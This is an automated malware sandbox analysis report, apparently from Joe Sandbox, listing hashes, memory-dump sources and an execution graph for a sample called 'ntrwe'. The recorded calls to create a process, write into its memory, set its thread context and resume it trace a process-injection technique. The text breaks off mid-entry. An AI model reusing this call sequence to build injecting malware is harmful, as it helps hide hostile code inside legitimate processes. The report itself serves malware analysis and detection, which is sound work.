                                                                                          • Instruction Fuzzy Hash: 4C11E676904280CFCF12CF10E9C4B16BF71FB94314F28C6A9D8450B616C336D866CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c0ead2874d45e91dd1eef20590183b2ffbdd6e39943fe764d8bf7e23e9ae685d
                                                                                          • Instruction ID: f107b40f56f14cee6d4f3bbfefbaa6a305b667b5b939edbdd738f26194d6212c
                                                                                          • Opcode Fuzzy Hash: c0ead2874d45e91dd1eef20590183b2ffbdd6e39943fe764d8bf7e23e9ae685d
                                                                                          • Instruction Fuzzy Hash: 6B01A731A083449AD7109E16EC88B67BF98EF41728F18C45ADE055A187C7799840CAB3
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1bd049d410581339c7843a8251c5c6b340e9b6a885d864cf7d5d9b72ee6c35a0
                                                                                          • Instruction ID: 4dfcc9e659cea9b9a0411b795bbef8a47efbfb9672f60ea23403b3d72c346bc4
                                                                                          • Opcode Fuzzy Hash: 1bd049d410581339c7843a8251c5c6b340e9b6a885d864cf7d5d9b72ee6c35a0
                                                                                          • Instruction Fuzzy Hash: 97F06276508244AAEB108E15DC88B63FF98EF52734F18C55AED085B286C3789C44CBB1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c8a24fd9c08f9e29a89bc83701a67f18c212a064c45deb9b91281b558f2735d
                                                                                          • Instruction ID: f83a709127b699683834e58482c639243dac1b57c1bc6fdb4e9e42f3c5324211
                                                                                          • Opcode Fuzzy Hash: 8c8a24fd9c08f9e29a89bc83701a67f18c212a064c45deb9b91281b558f2735d
                                                                                          • Instruction Fuzzy Hash: 31020574D00228CFDB29DFA5C844BEDBBB2BF49304F5481AAD809A7395DB359A85CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:31.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:1.8%
                                                                                          Total number of Nodes:169
                                                                                          Total number of Limit Nodes:16

                                                                                          Graph

                                                                                          execution_graph 11102 9d9038 11103 9d907c ResumeThread 11102->11103 11105 9d90c8 11103->11105 11295 9d86a8 11296 9d86ec VirtualAllocEx 11295->11296 11298 9d8764 11296->11298 11106 500e18 11108 500e35 11106->11108 11107 500fb7 11108->11107 11116 501430 11108->11116 11126 501420 11108->11126 11136 501569 11108->11136 11146 501679 11108->11146 11150 501582 11108->11150 11160 501df1 11108->11160 11164 501e00 11108->11164 11117 50144e 11116->11117 11118 5015bc 11117->11118 11120 501430 DeleteFileW 11117->11120 11121 501420 DeleteFileW 11117->11121 11122 501582 DeleteFileW 11117->11122 11123 501569 DeleteFileW 11117->11123 11124 501679 DeleteFileW 11117->11124 11119 501626 11118->11119 11168 501ca8 11118->11168 11119->11108 11120->11117 11121->11117 11122->11117 11123->11117 11124->11117 11128 501425 11126->11128 11127 501626 11127->11108 11129 5015bc 11128->11129 11131 501430 DeleteFileW 11128->11131 11132 501420 DeleteFileW 11128->11132 11133 501582 DeleteFileW 11128->11133 11134 501569 DeleteFileW 11128->11134 11135 501679 DeleteFileW 11128->11135 11129->11127 11130 501ca8 DeleteFileW 11129->11130 11130->11129 11131->11128 11132->11128 11133->11128 11134->11128 11135->11128 11137 50146c 11136->11137 11138 5015bc 11137->11138 11141 501430 DeleteFileW 11137->11141 11142 501420 DeleteFileW 11137->11142 11143 501582 DeleteFileW 11137->11143 11144 501569 DeleteFileW 11137->11144 11145 501679 DeleteFileW 11137->11145 11139 501626 11138->11139 11140 501ca8 DeleteFileW 11138->11140 11139->11108 11140->11138 11141->11137 11142->11137 11143->11137 11144->11137 11145->11137 11147 501699 11146->11147 11148 501736 11147->11148 11149 501ca8 DeleteFileW 11147->11149 11148->11108 11149->11147 11151 50146c 11150->11151 11152 5015bc 11151->11152 11154 501430 DeleteFileW 11151->11154 11155 501420 DeleteFileW 11151->11155 11156 501582 DeleteFileW 11151->11156 11157 501569 DeleteFileW 11151->11157 11158 501679 DeleteFileW 11151->11158 11153 501626 11152->11153 11159 501ca8 DeleteFileW 11152->11159 11153->11108 11154->11151 11155->11151 11156->11151 11157->11151 11158->11151 11159->11152 11161 501e11 11160->11161 11162 501e5b 11161->11162 11173 501f61 11161->11173 11162->11108 11165 501e11 11164->11165 11166 501e5b 11165->11166 11167 501f61 DeleteFileW 11165->11167 11166->11108 11167->11165 11170 501cd5 11168->11170 11169 501d2f 11169->11118 11170->11169 11171 501e00 DeleteFileW 11170->11171 11172 501df1 DeleteFileW 11170->11172 11171->11169 11172->11169 11174 501f81 11173->11174 11175 501fcb 11174->11175 11177 502010 11174->11177 11175->11161 11178 50203a 11177->11178 11179 502108 11178->11179 11181 502f68 11178->11181 11179->11174 11183 502f6d 11181->11183 11182 503060 11182->11179 11183->11182 11186 507a70 11183->11186 11190 507a60 11183->11190 11187 507a7c 11186->11187 11194 507ce9 11187->11194 11188 507a8f 11188->11183 11191 507a7c 11190->11191 11193 507ce9 DeleteFileW 11191->11193 11192 507a8f 11192->11183 11193->11192 11195 507d0c 11194->11195 11199 507dc8 11195->11199 11203 507db8 11195->11203 11196 507d24 11196->11188 11200 507de8 11199->11200 11207 502f5c 11200->11207 11204 507de8 11203->11204 11205 502f5c DeleteFileW 11204->11205 11206 507e1a 11205->11206 11206->11196 11208 507e80 DeleteFileW 11207->11208 11210 507e1a 11208->11210 11210->11196 11211 50eb98 11212 50eba4 11211->11212 11216 9d2c18 11212->11216 11237 9d2c08 11212->11237 11213 50ebc1 11218 9d2c47 11216->11218 11217 9d2e3f 11217->11213 11218->11217 11223 9d32b1 11218->11223 11258 5077c0 11218->11258 11261 5077b8 11218->11261 11219 9d3664 11229 5077c0 VirtualProtect 11219->11229 11230 5077b8 VirtualProtect 11219->11230 11220 9d35e6 11233 5077c0 VirtualProtect 11220->11233 11234 5077b8 VirtualProtect 11220->11234 11221 9d39bd 11221->11213 11222 9d37a0 11235 5077c0 VirtualProtect 11222->11235 11236 5077b8 VirtualProtect 11222->11236 11223->11219 11227 5077c0 VirtualProtect 11223->11227 11228 5077b8 VirtualProtect 11223->11228 11224 9d38b7 11224->11221 11231 5077c0 VirtualProtect 11224->11231 11232 5077b8 VirtualProtect 11224->11232 11227->11220 11228->11220 11229->11222 11230->11222 11231->11224 11232->11224 11233->11219 11234->11219 11235->11224 11236->11224 11239 9d2c47 11237->11239 11238 9d2e3f 11238->11213 11239->11238 11244 9d32b1 11239->11244 11246 5077c0 VirtualProtect 11239->11246 11247 5077b8 VirtualProtect 11239->11247 11240 9d3664 11250 5077c0 VirtualProtect 11240->11250 11251 5077b8 VirtualProtect 11240->11251 11241 9d35e6 11254 5077c0 VirtualProtect 11241->11254 11255 5077b8 VirtualProtect 11241->11255 11242 9d39bd 11242->11213 11243 9d37a0 11256 5077c0 VirtualProtect 11243->11256 11257 5077b8 VirtualProtect 11243->11257 11244->11240 11248 5077c0 VirtualProtect 11244->11248 11249 5077b8 VirtualProtect 11244->11249 11245 9d38b7 11245->11242 11252 5077c0 VirtualProtect 11245->11252 11253 5077b8 VirtualProtect 11245->11253 11246->11239 11247->11239 11248->11241 11249->11241 11250->11243 11251->11243 11252->11245 11253->11245 11254->11240 11255->11240 11256->11245 11257->11245 11259 50780d VirtualProtect 11258->11259 11260 507879 11259->11260 11260->11218 11262 50780d VirtualProtect 11261->11262 11263 507879 11262->11263 11263->11218 11299 503ac8 11300 503b15 VirtualProtect 11299->11300 11301 503b81 11300->11301 11264 9d8990 11265 9d89dc WriteProcessMemory 11264->11265 11267 9d8a75 11265->11267 11268 9d4870 11269 9d488a 11268->11269 11270 9d48cc 11269->11270 11272 9d4a20 11269->11272 11273 9d4a63 11272->11273 11277 9d5a90 11273->11277 11282 9d5a80 11273->11282 11274 9d4c83 11274->11269 11278 9d5ab7 11277->11278 11287 9d5bb4 11278->11287 11291 9d5bc0 11278->11291 11283 9d5ab7 11282->11283 11285 9d5bb4 CreateProcessAsUserW 11283->11285 11286 9d5bc0 CreateProcessAsUserW 11283->11286 11284 9d5b05 11284->11274 11285->11284 11286->11284 11288 9d5c41 CreateProcessAsUserW 11287->11288 11290 9d5dc1 11288->11290 11292 9d5c41 CreateProcessAsUserW 11291->11292 11294 9d5dc1 11292->11294 11302 9d8de0 11303 9d8e29 Wow64SetThreadContext 11302->11303 11305 9d8ea1 11303->11305

                                                                                          Executed Functions

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1517 9d5bc0-9d5c5b 1519 9d5c5d-9d5c6f 1517->1519 1520 9d5c72-9d5c7d 1517->1520 1519->1520 1521 9d5c7f-9d5c8e 1520->1521 1522 9d5c91-9d5ccd 1520->1522 1521->1522 1523 9d5ccf-9d5cde 1522->1523 1524 9d5ce1-9d5dbf CreateProcessAsUserW 1522->1524 1523->1524 1528 9d5dc8-9d5ea6 1524->1528 1529 9d5dc1-9d5dc7 1524->1529 1539 9d5edc-9d5ee7 1528->1539 1540 9d5ea8-9d5ed1 1528->1540 1529->1528 1543 9d5ee8 1539->1543 1540->1539 1543->1543
                                                                                          APIs
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009D5DAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcessUser
                                                                                          • String ID:
                                                                                          • API String ID: 2217836671-0
                                                                                          • Opcode ID: c26108a402a8e49d37fb11434b18b3f483af827cdf236ed36ab99801e5894038
                                                                                          • Instruction ID: bb33f8aea09c42bd07531228538fd6ab80ade9dd4df835f96bdf6d630a32bb88
                                                                                          • Opcode Fuzzy Hash: c26108a402a8e49d37fb11434b18b3f483af827cdf236ed36ab99801e5894038
                                                                                          • Instruction Fuzzy Hash: BA91EF74D0426D8FCB21CFA4C880BDDBBB5BF0A304F1191AAE548B7210DB719A85DF94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1489 9d5bb4-9d5c5b 1491 9d5c5d-9d5c6f 1489->1491 1492 9d5c72-9d5c7d 1489->1492 1491->1492 1493 9d5c7f-9d5c8e 1492->1493 1494 9d5c91-9d5ccd 1492->1494 1493->1494 1495 9d5ccf-9d5cde 1494->1495 1496 9d5ce1-9d5dbf CreateProcessAsUserW 1494->1496 1495->1496 1500 9d5dc8-9d5ea6 1496->1500 1501 9d5dc1-9d5dc7 1496->1501 1511 9d5edc-9d5ee7 1500->1511 1512 9d5ea8-9d5ed1 1500->1512 1501->1500 1515 9d5ee8 1511->1515 1512->1511 1515->1515
                                                                                          APIs
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009D5DAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcessUser
                                                                                          • String ID:
                                                                                          • API String ID: 2217836671-0
                                                                                          • Opcode ID: 24fb368297864572ff42cc2c39ae869923d5f42deb2df3fcdf1060a679b51e82
                                                                                          • Instruction ID: 32db8b269aef14f5d2d2270b384d8cbb74ba6ee8c098b3444ffc8e1ef120c6d5
                                                                                          • Opcode Fuzzy Hash: 24fb368297864572ff42cc2c39ae869923d5f42deb2df3fcdf1060a679b51e82
                                                                                          • Instruction Fuzzy Hash: 3D91E074D0426C8FCB21CFA4C880BDDBBB5BF1A304F1591AAE548B7260DB719A85DF94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1686 9d8988-9d89fb 1689 9d89fd-9d8a0f 1686->1689 1690 9d8a12-9d8a73 WriteProcessMemory 1686->1690 1689->1690 1692 9d8a7c-9d8ace 1690->1692 1693 9d8a75-9d8a7b 1690->1693 1693->1692
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009D8A63
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 833f8ec4f354ef381e0985bd130ea039c4e46d6f1d00e0430159803abc045719
                                                                                          • Instruction ID: d489fbdf0124aaa77c54286fad1c7ca7ae1618621d9484f92e10a0796bf75ef7
                                                                                          • Opcode Fuzzy Hash: 833f8ec4f354ef381e0985bd130ea039c4e46d6f1d00e0430159803abc045719
                                                                                          • Instruction Fuzzy Hash: 8041A9B5D052589FCB00CFA9D884ADEFBF1BB49310F24942AE815B7240D779AA45CB64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1698 9d8990-9d89fb 1700 9d89fd-9d8a0f 1698->1700 1701 9d8a12-9d8a73 WriteProcessMemory 1698->1701 1700->1701 1703 9d8a7c-9d8ace 1701->1703 1704 9d8a75-9d8a7b 1701->1704 1704->1703
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009D8A63
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 55b9ebb0da6f1f0b5438649727555cd91c3ca405924348349f5e2e386d97e915
                                                                                          • Instruction ID: 9cab94a706cdc89e7e2462f473d0413c02f3d875169f9cd22348aea6b4de4d36
                                                                                          • Opcode Fuzzy Hash: 55b9ebb0da6f1f0b5438649727555cd91c3ca405924348349f5e2e386d97e915
                                                                                          • Instruction Fuzzy Hash: 2C419AB4D052589FCF00CFA9D984ADEFBF1BF49314F14942AE815B7200D779AA45CB64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1709 502f25-507ed9 1714 507edb-507eea 1709->1714 1715 507eed-507f29 DeleteFileW 1709->1715 1714->1715 1716 507f32-507f74 1715->1716 1717 507f2b-507f31 1715->1717 1717->1716
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00507F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: b734b1083efc888e29446101772309d56706155b7f6cb755ed97f5253da2e6ab
                                                                                          • Instruction ID: bf8429ed5e77b86e844864f58f188b1a6e19b39c4d2ee816214e7fa312aaef7b
                                                                                          • Opcode Fuzzy Hash: b734b1083efc888e29446101772309d56706155b7f6cb755ed97f5253da2e6ab
                                                                                          • Instruction Fuzzy Hash: F8412270D092588FCB01CFA9D884ADEFFF4BF4A314F1984AAE444B7251C778A945CB65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 009D8752
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 44d320c0c5b8419e24b1c5cedd6bd7cb80e1d449ce8487a0c337ee0fe1944272
                                                                                          • Instruction ID: bf8cb3229ba4fdf0e9962b588833f35a8ac70ac1a33cbe2d0a05f389e8859c37
                                                                                          • Opcode Fuzzy Hash: 44d320c0c5b8419e24b1c5cedd6bd7cb80e1d449ce8487a0c337ee0fe1944272
                                                                                          • Instruction Fuzzy Hash: 8D4185B8D052589FCF10CFA9D884A9EBBB1BF49310F20A42AE815B7210D775A905CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 009D8752
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: d48bc6eb00cd9c11b4a4705e2b63c1f2eca987a71cefdfc05bda118b2402b413
                                                                                          • Instruction ID: 683e76f61c967425495179157789fb04ffc42b63fab46352847bcafadc5e7f3e
                                                                                          • Opcode Fuzzy Hash: d48bc6eb00cd9c11b4a4705e2b63c1f2eca987a71cefdfc05bda118b2402b413
                                                                                          • Instruction Fuzzy Hash: 6C3187B8D042589FCF10CFA9D884A9EFBB5BB49310F20942AE815B7310D775A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 009D8E8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 9be00f844653a65d572b497108b3be919d7529b390d0674526dc9cbd915a1a13
                                                                                          • Instruction ID: 9f90331cd73d344d99c6d52f909f2be490a73cfd36ab91f88b962aefc223657e
                                                                                          • Opcode Fuzzy Hash: 9be00f844653a65d572b497108b3be919d7529b390d0674526dc9cbd915a1a13
                                                                                          • Instruction Fuzzy Hash: E941DEB4D052189FCB10DFA9D884AEEFBF0BF49314F14842AE415B7200D779AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00503B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: aa7c4cfc51f45dfdec7fed11701849073b581ab9dfe0ead5d5739ce8bb6008f0
                                                                                          • Instruction ID: 11450985e1eaefc24c8ca2d23e2f4605353a3d2bf4cafb066ed1c5d3e496e8b7
                                                                                          • Opcode Fuzzy Hash: aa7c4cfc51f45dfdec7fed11701849073b581ab9dfe0ead5d5739ce8bb6008f0
                                                                                          • Instruction Fuzzy Hash: D731A8B8D042589FCB10CFA9D884AEEFBB0BF49310F24902AE814B7210C774AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00507867
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 4e31db07554d08eacf84c621bc97d22390df516e6a062a4f8a59c1d5457df844
                                                                                          • Instruction ID: 3aa3c9aaff043e6b757c2024b2f65ac50137f8b9dadbeb1b7fd32b2581ceab66
                                                                                          • Opcode Fuzzy Hash: 4e31db07554d08eacf84c621bc97d22390df516e6a062a4f8a59c1d5457df844
                                                                                          • Instruction Fuzzy Hash: 2F319AB5D042589FCF10CFA9D884ADEFBB0BF5A310F24902AE814B7250D375A945CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00503B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 22a418a20746f3279ae6e43760ca4a09894e5a68cd331ac8c715c6cf68c6b23a
                                                                                          • Instruction ID: a8f0265c28cd1b689a3d8ce81fe03f712678e55c4ef76d1c59f20941d9ec0748
                                                                                          • Opcode Fuzzy Hash: 22a418a20746f3279ae6e43760ca4a09894e5a68cd331ac8c715c6cf68c6b23a
                                                                                          • Instruction Fuzzy Hash: F93199B8D042589FCB10CFA9D884ADEFBB4BB19310F24902AE814B7210D775AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00507867
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 740f328b49dbbace9fe08795545d822c0587b9d13011bfca8f1c2f612e7aeb35
                                                                                          • Instruction ID: 22e478683f0800ded08e5dec264c640234118657d6ce1c10d5c1c9568c21db3d
                                                                                          • Opcode Fuzzy Hash: 740f328b49dbbace9fe08795545d822c0587b9d13011bfca8f1c2f612e7aeb35
                                                                                          • Instruction Fuzzy Hash: 8E3179B9D042589FCB10CFA9D884ADEFBB0BF49310F24942AE814B7250D775A945CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 009D8E8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: b697ee63c7f248414e2de721fd95ca94201b2d1a27a849f16fce86fcd672dbdc
                                                                                          • Instruction ID: 77e61c3f5f3f662dd083a4e78e15c03ef377abfd5f57402dc43e00761d1f074b
                                                                                          • Opcode Fuzzy Hash: b697ee63c7f248414e2de721fd95ca94201b2d1a27a849f16fce86fcd672dbdc
                                                                                          • Instruction Fuzzy Hash: 2A31BCB4D052589FCB10DFA9D884AEEFBF0BF49314F14842AE415B7240D779AA45CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00507F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 981192040724eb89d3fa41d764cc8de603543dccf4c2b9f155168b405f5666f8
                                                                                          • Instruction ID: f04195449113af607e33e0d3f7bb964685cefaccd39784e65f29d4ecce91a633
                                                                                          • Opcode Fuzzy Hash: 981192040724eb89d3fa41d764cc8de603543dccf4c2b9f155168b405f5666f8
                                                                                          • Instruction Fuzzy Hash: 5931B9B4D092599FCB10CFA9D884AEEFBF0BF49314F24846AE415B7250D378AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00507F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190278747.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_500000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: b64a87801dfcc6a6a18ac12e4af573ba977f1fa6436e339f5dc0cdba302056a2
                                                                                          • Instruction ID: 3a35766366c090caaa257d3351d169675bc1de6c9900dd7efc5b834a9be713d1
                                                                                          • Opcode Fuzzy Hash: b64a87801dfcc6a6a18ac12e4af573ba977f1fa6436e339f5dc0cdba302056a2
                                                                                          • Instruction Fuzzy Hash: BB31CAB4D0521D9FCB10CFA9D884AAEFBF4BB49314F24846AE404B7250D374AA45CB94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 009D90B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 4d65fb6652e79899fa118ffb9e057e3bfe0c8f172000aa7223c2b497e2913813
                                                                                          • Instruction ID: c2cf5eba42f96f8f5d63b7a65928e4f334b761eb20061d3423a17ecd515f9614
                                                                                          • Opcode Fuzzy Hash: 4d65fb6652e79899fa118ffb9e057e3bfe0c8f172000aa7223c2b497e2913813
                                                                                          • Instruction Fuzzy Hash: 5331CDB4D052589FCB10CFA9E884ADEFBB0AF49314F14942AE815B7350C775A905CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 009D90B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2190617763.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_9d0000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: b78654d4964c837db203ed80329933d8988c26285472aed6571cfd7b3c76df87
